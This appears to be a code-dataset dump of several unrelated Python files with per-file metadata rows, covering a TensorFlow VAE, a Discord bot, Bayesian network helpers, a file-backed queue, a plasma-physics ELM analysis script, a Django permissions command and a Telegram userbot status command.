'mean' : tf.Tensor
If `use_dense` is True, shape (B, n_vars)
Otherwise, shape (B, H', W', n_vars)
'log_sigma' : tf.Tensor, same shape as 'means'
'sample' : tf.Tensor, same shape as 'means'
'decoded' : tf.Tensor, shape (B, H, W, C)
"""
means, log_sigmas = self.encode(inputs, training=training)
samples = self.sample(means, log_sigmas)
decoded = self.decode(samples, training=training)
return {
'mean': means,
'log_sigma': log_sigmas,
'sample': samples,
'decoded': decoded,
}
def predict(self, inputs):
pred = self(inputs, training=False)
pred['sigma'] = tf.math.exp(pred['log_sigma'])
pred['decoded'] = tf.nn.sigmoid(pred['decoded'])
return pred
def loss_fn(self, batch, prediction, step):
# TODO: make beta increase over time
recons_loss = losses.reconstruction_loss(
loss_type=self._recons_type,
prediction=prediction['decoded'],
labels=batch,
is_logit=True,
)
mean_reshaped = tf.reshape(
prediction['mean'], (-1, self._n_vars)
)
log_sigma_reshaped = tf.reshape(
prediction['log_sigma'], (-1, self._n_vars)
)
sample_reshaped = tf.reshape(
prediction['sample'], (-1, self._n_vars)
)
if self._kl_type == 'close':
kl_loss = losses.KL(
mean=mean_reshaped,
log_sigma=log_sigma_reshaped,
)
elif self._kl_type == 'mc':
kl_loss = losses.KL_monte_carlo(
sample_reshaped,
mean=mean_reshaped,
log_sigma=log_sigma_reshaped,
)
else:
raise ValueError()
Hp = tf.shape(prediction['mean'])[1]
Wp = tf.shape(prediction['mean'])[2]
kl_loss = tf.reshape(kl_loss, (-1, Hp, Wp))
kl_loss = tf.reduce_mean(kl_loss, axis=(1, 2))
if step >= self._kl_add_step:
loss = recons_loss + self._beta * kl_loss
else:
loss = recons_loss
return loss
def train_callback(self):
pass
def summary(self, writer, batch, step, training=None):
pred = self.call(batch, training=training)
recons = tf.nn.sigmoid(pred['decoded'])
with writer.as_default():
tf.summary.image("input", batch, step=step)
tf.summary.image("recons", recons, step=step)
@classmethod
def from_config(cls, config):
encoder_configs = [
cnn.LayerConfig(**layer_config)
for layer_config in config['encoder']
]
decoder_configs = [
cnn.LayerConfig(**layer_config)
for layer_config in config['decoder']
]
layer = cls(
encoder_configs=encoder_configs,
decoder_configs=decoder_configs,
**config['conv_vae_layer'],
)
return layer
| 31.473094 | 71 | 0.563368 | 1,695 | 14,037 | 4.434808 | 0.128614 | 0.023281 | 0.01317 | 0.00745 | 0.574165 | 0.523746 | 0.459891 | 0.426234 | 0.334974 | 0.306904 | 0 | 0.004703 | 0.333476 | 14,037 | 445 | 72 | 31.54382 | 0.798739 | 0.243143 | 0 | 0.476703 | 0 | 0 | 0.033092 | 0 | 0 | 0 | 0 | 0.004494 | 0 | 1 | 0.078853 | false | 0.007168 | 0.014337 | 0.010753 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fd08595273898979a4350401388133ed3dd3b1 | 245 | py | Python | main.py | DepressedGiraffe/simple-python-script | da506de8b7c64a1e04e05714fbbace4c757a46de | [
"MIT"
] | null | null | null | main.py | DepressedGiraffe/simple-python-script | da506de8b7c64a1e04e05714fbbace4c757a46de | [
"MIT"
] | null | null | null | main.py | DepressedGiraffe/simple-python-script | da506de8b7c64a1e04e05714fbbace4c757a46de | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
bot = commands.Bot(command_prefix="brexit ")
@bot.event
async def on_ready():
print("brexit bot ready")
@bot.command()
async def brexit(ctx):
await ctx.send("I agree")
bot.run("token")
| 16.333333 | 44 | 0.710204 | 37 | 245 | 4.648649 | 0.594595 | 0.127907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15102 | 245 | 14 | 45 | 17.5 | 0.826923 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fd58f8ef0e6453a57b977a3dc3de1317f3bc00 | 726 | py | Python | torchbnn/utils/freeze_model.py | anaplasia29/Bayesian-Neural-Network | d98df8039e52cd2505dc8a94ed3cd474c2056d9a | [
"MIT"
] | null | null | null | torchbnn/utils/freeze_model.py | anaplasia29/Bayesian-Neural-Network | d98df8039e52cd2505dc8a94ed3cd474c2056d9a | [
"MIT"
] | null | null | null | torchbnn/utils/freeze_model.py | anaplasia29/Bayesian-Neural-Network | d98df8039e52cd2505dc8a94ed3cd474c2056d9a | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from ..modules import *
bayes_layer = (BayesLinear, BayesConv2d, BayesBatchNorm2d)
def freeze(module):
"""
Methods for freezing bayesian-model.
Arguments:
model (nn.Module): a model to be freezed.
"""
if isinstance(module, bayes_layer) :
module.freeze()
for submodule in module.children() :
freeze(submodule)
def unfreeze(module):
"""
Methods for unfreezing bayesian-model.
Arguments:
model (nn.Module): a model to be unfreezed.
"""
if isinstance(module, bayes_layer) :
module.unfreeze()
for submodule in module.children() :
unfreeze(submodule) | 22 | 61 | 0.608815 | 77 | 726 | 5.701299 | 0.415584 | 0.068337 | 0.072893 | 0.123007 | 0.487472 | 0.359909 | 0.205011 | 0.205011 | 0.205011 | 0.205011 | 0 | 0.003914 | 0.296143 | 726 | 33 | 62 | 22 | 0.855186 | 0.26584 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fe3d920d315602760741701f4929555bcf00ba | 7,072 | py | Python | FileQueue.py | ZMcursor/pythonFileQueue | b6e042295cc00ef952adc5fdaa2143238bd44794 | [
"Apache-2.0"
] | null | null | null | FileQueue.py | ZMcursor/pythonFileQueue | b6e042295cc00ef952adc5fdaa2143238bd44794 | [
"Apache-2.0"
] | null | null | null | FileQueue.py | ZMcursor/pythonFileQueue | b6e042295cc00ef952adc5fdaa2143238bd44794 | [
"Apache-2.0"
] | null | null | null | """A multi-producer, multi-consumer queue based on file system"""
import os
import tempfile
import threading
from collections import deque
from time import time as _time
try:
import cPickle as _pickle
except ImportError:
import pickle as _pickle
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
__all__ = ["Empty", "FileQueue"]
class FileQueue(object):
""" Create a queue object with the given 'buffer_dir' and 'buffer_size'.
When the size of queue is reach the 'buffer_size',then the queue
will be pickled to a file under the 'buffer_dir'.
'buffer_dir' will be created if neccesary and if 'buffer_dir' is not
given,then the Temporary directory will be use.
"""
def __init__(self, buffer_dir=None, buffer_size=100000, save_data=False):
if buffer_dir:
self.__buffer_dir = buffer_dir
else:
self.__buffer_dir = os.path.join(
tempfile.gettempdir(), 'pyFileQueue')
self.__buffer_size = buffer_size
# whether to save data when closing
self.__save_data = save_data
# create buffer_dir if neccesary
if not os.path.exists(self.__buffer_dir):
os.makedirs(self.__buffer_dir)
info_path = os.path.join(self.__buffer_dir, 'info')
if os.path.exists(info_path):
# load info
with open(info_path, 'rb') as f:
self.__size, self.__files = _pickle.load(f)
else:
self.__size = 0
self.__files = deque()
# queue to put item
self.__queue_in = deque()
# queue to get item
self.__queue_out = deque()
self.__mutex = threading.Lock()
self.__not_empty = threading.Condition(self.__mutex)
def put(self, item):
"""Put an item into the queue.
The queue will pickled to a file if its size reach the buffer_size.
"""
self.__mutex.acquire()
try:
self.__queue_in.append(item)
if len(self.__queue_in) >= self.__buffer_size:
if not self.__files and not self.__queue_out:
self.__queue_in, self.__queue_out = self.__queue_out, self.__queue_in
else:
self.__save_to_file(self.__queue_in)
self.__queue_in = deque()
self.__size += 1
self.__not_empty.notify()
finally:
self.__mutex.release()
def get(self, block=True, timeout=0):
"""Remove and return an item from the queue.
If optional args 'block' is true,block if necessary until an item
is available. If 'timeout' is greater than 0, it blocks at most
'timeout' seconds and raises the Empty exception if no item was
available within that time.
Otherwise ('block' is false), return an item if one is immediately
available, else raise the Empty exception ('timeout' is ignored
in that case).
"""
self.__not_empty.acquire()
try:
if not self.__queue_out:
if self.__files:
self.__queue_out = self.__get_from_file(
self.__files.popleft())
elif self.__queue_in:
self.__queue_in, self.__queue_out = self.__queue_out, self.__queue_in
else:
if block:
if timeout > 0:
end = _time() + timeout
while not self.__queue_in:
remaining = end - _time()
if remaining <= 0.0:
raise Empty
self.__not_empty.wait(remaining)
else:
while not self.__queue_in:
self.__not_empty.wait()
self.__queue_in, self.__queue_out = self.__queue_out, self.__queue_in
else:
raise Empty
self.__size -= 1
return self.__queue_out.popleft()
finally:
self.__not_empty.release()
def get_nowait(self):
"""Remove and return an item from the queue without blocking.
Only get an item if one is immediately available. Otherwise
raise the Empty exception.
"""
return self.get(block=False)
def size(self):
"""Return the approximate size of the queue (not reliable!)."""
return self.__size
@property
def buffer_dir(self):
"""Return the buffer directory."""
return self.__buffer_dir
@property
def buffer_size(self):
"""Return the buffer size."""
return self.__buffer_size
@property
def is_save_data(self):
"""Return if save data."""
return self.__save_data
def __save_to_file(self, queue, tail=True):
"""Pickled a queue to a file"""
file_name = str(int(_time() * 1000))
if tail:
self.__files.append(file_name)
else:
self.__files.appendleft(file_name)
with open(os.path.join(self.__buffer_dir, file_name), 'wb') as f:
_pickle.dump(queue, f, -1)
def __get_from_file(self, filename):
"""Load a queue from file"""
file_path = os.path.join(self.__buffer_dir, filename)
with open(file_path, 'rb') as f:
obj = _pickle.load(f)
os.remove(file_path)
return obj
def close(self):
"""Save data and remove useless file if naccesary.
if 'save_data' is True,queue will be saved.Otherwise the
buffer_dir will be remove.
"""
def rmdir(dir_path):
for item in os.listdir(dir_path):
path = os.path.join(dir_path, item)
if os.path.isdir(path):
rmdir(path)
else:
os.remove(path)
os.rmdir(dir_path)
if self.__save_data and self.__files is not None:
if self.__queue_in:
self.__save_to_file(self.__queue_in)
if self.__queue_out:
self.__save_to_file(self.__queue_out, False)
if self.__files:
with open(os.path.join(self.__buffer_dir, 'info'), 'wb') as f:
_pickle.dump((self.__size, self.__files), f, -1)
else:
rmdir(self.__buffer_dir)
else:
rmdir(self.__buffer_dir)
self.__queue_in = None
self.__queue_out = None
self.__files = None
def __len__(self):
return self.__size
def __repr__(self):
return 'FileQueue(localtion:%s, size:%d)' % (self.__buffer_dir, self.__size)
def __del__(self):
self.close()
| 35.36 | 94 | 0.548784 | 846 | 7,072 | 4.231678 | 0.189125 | 0.080447 | 0.052235 | 0.040223 | 0.193855 | 0.143296 | 0.127374 | 0.077654 | 0.041899 | 0.041899 | 0 | 0.004476 | 0.368213 | 7,072 | 199 | 95 | 35.537688 | 0.796777 | 0.204044 | 0 | 0.281481 | 0 | 0 | 0.014009 | 0.004414 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.081481 | 0.014815 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6501b22de85551754d2ad6fd9ef9fe788f4640b8 | 18,735 | py | Python | publications/generate_database_for_jim.py | fusion-flap/flap_nstx_gpi | cf7d4bdecea8fd7434f8f7eb64e1a7b13fc0f759 | [
"MIT"
] | null | null | null | publications/generate_database_for_jim.py | fusion-flap/flap_nstx_gpi | cf7d4bdecea8fd7434f8f7eb64e1a7b13fc0f759 | [
"MIT"
] | 1 | 2019-10-03T22:25:58.000Z | 2021-10-06T10:31:11.000Z | publications/generate_database_for_jim.py | fusion-flap/flap_nstx_gpi | cf7d4bdecea8fd7434f8f7eb64e1a7b13fc0f759 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 25 17:48:40 2020
@author: mlampert
"""
import os
import copy
import csv
import pandas
import numpy as np
import pickle
import flap
import flap_nstx
from flap_nstx.analysis import calculate_nstx_gpi_frame_by_frame_velocity, calculate_nstx_gpi_smooth_velocity
from flap_nstx.analysis import flap_nstx_thomson_data, get_nstx_thomson_gradient, get_fit_nstx_thomson_profiles
thisdir = os.path.dirname(os.path.realpath(__file__))
fn = os.path.join(thisdir,'../flap_nstx.cfg')
flap.config.read(file_name=fn)
flap_nstx.register()
def generate_database_for_jim(elm_window=500e-6,
elm_duration=100e-6,
averaging='before_after', #The type of averaging for the _avg results ['before_after', 'full', 'elm']
gradient_type='max', #Type of the gradient calculation ['max', 'local', 'global']
scale_length=False, #Calculate the grad/abs instead of the gradient
recalc=False, #Recalculate the results and do not load from the pickle file
plot=False, #Plot the results with matplotlib
plot_error=False,
pdf=False, #Save the results into a PDF
thomson_time_window=2e-3, #Time window of the Thomson data compared to the ELM time
correlation_threshold=0.6,
spline_thomson=False, #Calculate the results from the spline fit Thomson data
auto_x_range=True,
auto_y_range=True,
pressure_grad_range=None, #Plot range for the pressure gradient
density_grad_range=None, #Plot range for the density gradient
temperature_grad_range=None, #Plot range for the temperature gradient (no outliers, no range)
thomson_frequency=60., #Frequency of the Thomson scattering in Hz
normalized_structure=True,
normalized_velocity=True,
subtraction_order=4,
plot_thomson_profiles=False,
plot_only_good=False, #Plot only those results, which satisfy the dependence_error_threshold condition.
dependence_error_threshold=0.5, #Line fitting error dependence relative error threshold. Results under this value are plotted into a text file.
inverse_fit=False,
plot_linear_fit=True,
test=False,
window_average=500e-6,
sampling_time=2.5e-6,
ahmed_database=True,
):
nwin=int(window_average/sampling_time)
database_single={'n_e':0.,
'T_e':0.,
'B_tor':0.,
'B_pol':0.,
'B_rad':0.,}
notnan_db_single=copy.deepcopy(database_single)
average_results={'Velocity ccf':np.zeros([2*nwin,2]),
'Velocity str avg':np.zeros([2*nwin,2]),
'Velocity str max':np.zeros([2*nwin,2]),
'Size avg':np.zeros([2*nwin,2]),
'Size max':np.zeros([2*nwin,2]),
'Position avg':np.zeros([2*nwin,2]),
'Position max':np.zeros([2*nwin,2]),
'Centroid avg':np.zeros([2*nwin,2]),
'Centroid max':np.zeros([2*nwin,2]),
'COG avg':np.zeros([2*nwin,2]),
'COG max':np.zeros([2*nwin,2]),
'Area avg':np.zeros([2*nwin]),
'Area max':np.zeros([2*nwin]),
'Elongation avg':np.zeros([2*nwin]),
'Elongation max':np.zeros([2*nwin]),
'Angle avg':np.zeros([2*nwin]),
'Angle max':np.zeros([2*nwin]),
'Str number':np.zeros([2*nwin]),
}
notnan_counter=copy.deepcopy(average_results)
if gradient_type not in ['max', 'local', 'global']:
raise ValueError('Gradient_type should be one of the following: max, local, global')
#GPI spatial_coefficients
coeff_r=np.asarray([3.7183594,-0.77821046,1402.8097])/1000. #The coordinates are in meters, the coefficients are in mm
flap.delete_data_object('*')
wd=flap.config.get_all_section('Module NSTX_GPI')['Working directory']
if spline_thomson:
result_filename=wd+'/processed_data/'+'elm_profile_dependence_spline'
else:
result_filename=wd+'/processed_data/'+'elm_profile_dependence'
if scale_length:
result_filename+='_scale'
result_filename+='_'+gradient_type+'_grad'
result_filename+='_'+averaging+'_avg'
result_filename+='_'+str(thomson_time_window*1000)+'ms_both'
if normalized_structure:
result_filename+='_ns'
if normalized_velocity:
result_filename+='_nv'
result_filename+='_so'+str(subtraction_order)
#Load and process the ELM database
database_file='/Users/mlampert/work/NSTX_workspace/db/ELM_findings_mlampert_velocity_good.csv'
db=pandas.read_csv(database_file, index_col=0)
elm_index=list(db.index)
coeff_r=np.asarray([3.7183594,-0.77821046,1402.8097])/1000. #The coordinates are in meters, the coefficients are in mm
coeff_z=np.asarray([0.18090118,3.0657776,70.544312])/1000. #The coordinates are in meters, the coefficients are in mm
coeff_r_new=3./800.
coeff_z_new=3./800.
det=coeff_r[0]*coeff_z[1]-coeff_z[0]*coeff_r[1]
elm_number=0.
if ahmed_database:
db_ahmed=[]
with open('/Users/mlampert/work/NSTX_workspace/WORK_MATE/Profile_fitsfur_Mate') as tsvfile:
reader = csv.reader(tsvfile, delimiter='\t')
for row in reader:
line=[]
for data in row:
try:
line.append(float(data.strip(' ')))
except:
pass
db_ahmed.append(line)
db_ahmed=np.asarray(db_ahmed).transpose()
db_dict={'shot':db_ahmed[0,:],
'time1':db_ahmed[1,:],
'time2':db_ahmed[2,:],
'T_e_ped':db_ahmed[3,:],
'n_e_ped':db_ahmed[4,:],
'p_e_ped':db_ahmed[5,:],
'T_e_max_grad':db_ahmed[6,:],
'n_e_max_grad':db_ahmed[7,:],
'p_e_max_grad':db_ahmed[8,:],
'T_e_width':db_ahmed[9,:],
'n_e_width':db_ahmed[10,:],
'p_e_width':db_ahmed[11,:],
}
for index_elm in range(len(elm_index)):
elm_time=db.loc[elm_index[index_elm]]['ELM time']/1000.
shot=int(db.loc[elm_index[index_elm]]['Shot'])
if normalized_velocity:
if normalized_structure:
str_add='_ns'
else:
str_add=''
filename=flap_nstx.analysis.filename(exp_id=shot,
working_directory=wd+'/processed_data',
time_range=[elm_time-2e-3,elm_time+2e-3],
comment='ccf_velocity_pfit_o'+str(subtraction_order)+'_fst_0.0'+str_add+'_nv',
extension='pickle')
else:
filename=wd+'/processed_data/'+db.loc[elm_index[index_elm]]['Filename']+'.pickle'
#grad.slice_data(slicing=time_slicing)
status=db.loc[elm_index[index_elm]]['OK/NOT OK']
if status != 'NO':
velocity_results=pickle.load(open(filename, 'rb'))
det=coeff_r[0]*coeff_z[1]-coeff_z[0]*coeff_r[1]
for key in ['Velocity ccf','Velocity str max','Velocity str avg','Size max','Size avg']:
orig=copy.deepcopy(velocity_results[key])
velocity_results[key][:,0]=coeff_r_new/det*(coeff_z[1]*orig[:,0]-coeff_r[1]*orig[:,1])
velocity_results[key][:,1]=coeff_z_new/det*(-coeff_z[0]*orig[:,0]+coeff_r[0]*orig[:,1])
velocity_results['Velocity ccf'][np.where(velocity_results['Correlation max'] < correlation_threshold),:]=[np.nan,np.nan]
time=velocity_results['Time']
elm_time_interval_ind=np.where(np.logical_and(time >= elm_time-window_average,
time <= elm_time+window_average))
elm_time=(time[elm_time_interval_ind])[np.argmin(velocity_results['Frame similarity'][elm_time_interval_ind])]
elm_time_ind=np.argmin(np.abs(time-elm_time))
for key in average_results.keys():
if len(average_results[key].shape) == 1:
ind_nan=np.isnan(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin])
notnan_counter[key]+=np.logical_not(ind_nan)
(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin])[ind_nan]=0.
average_results[key]+=velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin]
else:
ind_nan_rad=np.isnan(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,0])
ind_nan_pol=np.isnan(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,1])
notnan_counter[key][:,0]+=np.logical_not(ind_nan_rad)
notnan_counter[key][:,1]+=np.logical_not(ind_nan_pol)
(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,0])[ind_nan_rad]=0.
(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,1])[ind_nan_pol]=0.
average_results[key][:,0]+=velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,0]
average_results[key][:,1]+=velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,1]
if not ahmed_database:
try:
n_e_param=get_fit_nstx_thomson_profiles(exp_id=shot, #Shot number
pressure=False, #Return the pressure profile paramenters
temperature=False, #Return the temperature profile parameters
density=True, #Return the density profile parameters
flux_coordinates=True, #Calculate the results in flux coordinates
flux_range=[0.5,1.4], #The normalaized flux coordinates range for returning the results
test=False,
output_name=None,
return_parameters=True,
plot_time=None,
pdf_object=None,
)
n_e_alltime=n_e_param['Value at max']
time_thomson=n_e_param['Time']
elm_ind=np.argmin(np.abs(time_thomson-elm_time))
n_e=n_e_alltime[elm_ind]
print('n_e', n_e)
if n_e != 0.:
database_single['n_e']+=n_e
notnan_db_single['n_e']+=1
except:
pass
try:
T_e_param=get_fit_nstx_thomson_profiles(exp_id=shot, #Shot number
pressure=False, #Return the pressure profile paramenters
temperature=True, #Return the temperature profile parameters
density=False, #Return the density profile parameters
flux_coordinates=True, #Calculate the results in flux coordinates
flux_range=[0.5,1.4], #The normalaized flux coordinates range for returning the results
test=False,
output_name=None,
return_parameters=True,
plot_time=None,
pdf_object=None,
)
T_e_alltime=T_e_param['Value at max']
time_thomson=T_e_param['Time']
elm_ind=np.argmin(np.abs(time_thomson-elm_time))
T_e=T_e_alltime[elm_ind]
# print('T_e',T_e)
if T_e != 0 and T_e < 2.:
database_single['T_e']+=T_e
notnan_db_single['T_e']+=1
except:
pass
else:
db_ind=np.where(np.logical_and(db_dict['shot'] == shot, np.logical_and(db_dict['time1'] < elm_time*1e3, db_dict['time2'] > elm_time*1e3)))
if db_ind[0] != []:
if db_ind[0].shape !=1:
T_e=db_dict['T_e_max_grad'][db_ind][0]
n_e=db_dict['n_e_max_grad'][db_ind][0]
else:
T_e=db_dict['T_e_max_grad'][db_ind]
n_e=db_dict['n_e_max_grad'][db_ind]
print(shot, elm_time, T_e, n_e, )
if T_e != 0 and T_e < 2.:
database_single['T_e']+=T_e
notnan_db_single['T_e']+=1
if n_e != 0.:
database_single['n_e']+=n_e
notnan_db_single['n_e']+=1
try:
if velocity_results['Position max'][elm_time_ind,0] != 0.:
b_pol=flap.get_data('NSTX_MDSPlus',
name='\EFIT02::\BZZ0',
exp_id=shot,
object_name='BZZ0').slice_data(slicing={'Time':elm_time,
'Device R':velocity_results['Position max'][elm_time_ind,0]}).data
database_single['B_pol']+=b_pol
notnan_db_single['B_pol']+=1
except:
pass
try:
if velocity_results['Position max'][elm_time_ind,0] != 0.:
b_tor=flap.get_data('NSTX_MDSPlus',
name='\EFIT02::\BTZ0',
exp_id=shot,
object_name='BTZ0').slice_data(slicing={'Time':elm_time,
'Device R':velocity_results['Position max'][elm_time_ind,0]}).data
database_single['B_tor']+=b_tor
notnan_db_single['B_tor']+=1
except:
pass
try:
if velocity_results['Position max'][elm_time_ind,0] != 0.:
b_rad=flap.get_data('NSTX_MDSPlus',
name='\EFIT02::\BRZ0',
exp_id=shot,
object_name='BRZ0').slice_data(slicing={'Time':elm_time,
'Device R':velocity_results['Position max'][elm_time_ind,0]}).data
database_single['B_rad']+=b_rad
notnan_db_single['B_rad']+=1
except:
pass
for key in average_results.keys():
notnan_counter[key][np.where(notnan_counter[key] == 0)] = 1.
if 'ccf' in key:
if len(average_results[key].shape) == 1:
average_results[key]=average_results[key]/(notnan_counter[key])
else:
average_results[key][:,0]=average_results[key][:,0]/(notnan_counter[key][:,0])
average_results[key][:,1]=average_results[key][:,1]/(notnan_counter[key][:,1])
else:
if len(average_results[key].shape) == 1:
average_results[key]=average_results[key]/(notnan_counter[key])
else:
average_results[key][:,0]=average_results[key][:,0]/(notnan_counter[key][:,0])
average_results[key][:,1]=average_results[key][:,1]/(notnan_counter[key][:,1])
try:
for key in database_single:
database_single[key]/=notnan_db_single[key]
except:
print(key, database_single[key], notnan_db_single[key])
for key in average_results:
if len(average_results[key].shape) == 1:
print(key, average_results[key][nwin])
else:
print(key, average_results[key][nwin,:])
for key in database_single:
print(key, database_single[key])
return average_results
| 54.147399 | 181 | 0.474086 | 2,004 | 18,735 | 4.153693 | 0.151697 | 0.037842 | 0.030034 | 0.025949 | 0.524988 | 0.441134 | 0.370975 | 0.322201 | 0.310428 | 0.310428 | 0 | 0.027992 | 0.426048 | 18,735 | 346 | 182 | 54.147399 | 0.746117 | 0.087643 | 0 | 0.315068 | 0 | 0 | 0.075534 | 0.011436 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003425 | false | 0.020548 | 0.034247 | 0 | 0.041096 | 0.020548 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6501be92de936ccea75975506702f6273eb33003 | 958 | py | Python | authentication/management/commands/init.py | HiroshiFuu/cs-balloting | 565eb3ee88769d88b27705828c10c7b5be964ef5 | [
"MIT"
] | null | null | null | authentication/management/commands/init.py | HiroshiFuu/cs-balloting | 565eb3ee88769d88b27705828c10c7b5be964ef5 | [
"MIT"
] | null | null | null | authentication/management/commands/init.py | HiroshiFuu/cs-balloting | 565eb3ee88769d88b27705828c10c7b5be964ef5 | [
"MIT"
] | null | null | null | from django.core.management.base import BaseCommand
from django.contrib.auth.models import Group
from django.contrib.auth.models import Permission
class Command(BaseCommand):
help = "Init Group"
# def add_arguments(self, parser):
# parser.add_argument('', nargs='+', help='')
def handle(self, *args, **options):
group, created = Group.objects.get_or_create(name='CompanyUserGroup')
print('Init Group', group)
permissions = ['Can add User', 'Can change User', 'Can delete User', 'Can view User', 'Can add Survey', 'Can change Survey', 'Can delete Survey', 'Can view Survey', 'Can add Survey Option', 'Can change Survey Option', 'Can delete Survey Option', 'Can view Survey Option', 'Can view Survey Result', 'Can view Survey Vote']
for p_name in permissions:
permission = Permission.objects.get(name__iexact=p_name)
print(permission)
group.permissions.add(permission) | 50.421053 | 329 | 0.685804 | 123 | 958 | 5.276423 | 0.390244 | 0.053929 | 0.080123 | 0.064715 | 0.169492 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195198 | 958 | 19 | 330 | 50.421053 | 0.841764 | 0.083507 | 0 | 0 | 0 | 0 | 0.327626 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.461538 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65046a43f01644999a41068e20bb218d33e7cac9 | 3,426 | py | Python | userbot/modules/alive.py | im-bb/CyberUserBot | 945c2d6a4c05b11592611b2451a7cf15a40c3530 | [
"MIT"
] | 2 | 2021-09-24T06:19:40.000Z | 2021-09-30T12:24:56.000Z | userbot/modules/alive.py | im-bb/CyberUserBot | 945c2d6a4c05b11592611b2451a7cf15a40c3530 | [
"MIT"
] | null | null | null | userbot/modules/alive.py | im-bb/CyberUserBot | 945c2d6a4c05b11592611b2451a7cf15a40c3530 | [
"MIT"
] | null | null | null | # Copyright 2021 (C) CYBERUSERBOT
#
# Farid Dadashzade - CyberUserBot
import time
from asyncio import create_subprocess_exec as asyncrunapp
from asyncio.subprocess import PIPE as asyncPIPE
from shutil import which
from os import remove
from userbot import (
ALIVE_LOGO,
CYBER_VERSION,
StartTime,
JARVIS,
SUPPORT,
MYID,
ALIVE_TEXT,
bot
)
from userbot.events import register
from userbot.cmdhelp import CmdHelp
async def get_readable_time(seconds: int) -> str:
count = 0
up_time = ""
time_list = []
time_suffix_list = ["saniyə", "dəqiqə", "saat", "gün"]
while count < 4:
count += 1
remainder, result = divmod(seconds, 60) if count < 3 else divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for x in range(len(time_list)):
time_list[x] = str(time_list[x]) + time_suffix_list[x]
if len(time_list) == 4:
up_time += time_list.pop() + ", "
time_list.reverse()
up_time += ", ".join(time_list)
return up_time
@register(outgoing=True, disable_errors=True, pattern=r"^\.salive(?: |$)(.*)")
async def salive(alive):
user = await bot.get_me()
islememuddeti = await get_readable_time((time.time() - StartTime))
#uid = user.id
#cyber_m = uid.id
#cyber_mention = f"{user.first_name}](tg://user?id={cyber_m})"
kecid = (
f"**{ALIVE_TEXT}** \n"
f"┏━━━━━━━━━━━━━━━━━━━━━━\n"
f"┣[ 🧭 **Botun işləmə müddəti:** `{islememuddeti}`\n"
f"┣[ 👤 **Mənim sahibim:** `{user.first_name}`\n"
f"┣[ 🐍 **Python:** `3.8.6`\n"
f"┣[ ⚙️ **Telethon:** `1.23.0`\n"
f"┣[ 👁🗨 **İstifadəçi adı:** @{user.username}\n"
f"┣[ 🗄 **Branch:** `Master`\n"
f"┗━━━━━━━━━━━━━━━━━━━━━━\n"
f"**C Y B Ξ R Version:** `{CYBER_VERSION}`"
)
if ALIVE_LOGO:
try:
logo = ALIVE_LOGO
await alive.delete()
msg = await bot.send_file(alive.chat_id, logo, caption=kecid)
await asyncio.sleep(100)
await msg.delete()
except BaseException:
await alive.edit(
kecid + "\n\n *`Təqdim olunan logo etibarsızdır."
"\nKeçidin logo şəklinə yönəldiyindən əmin olun`"
)
await asyncio.sleep(100)
await alive.delete()
else:
await alive.edit(kecid)
await asyncio.sleep(100)
await alive.delete()
@register(incoming=True, from_users=SUPPORT, disable_errors=True, pattern="^.wlive$")
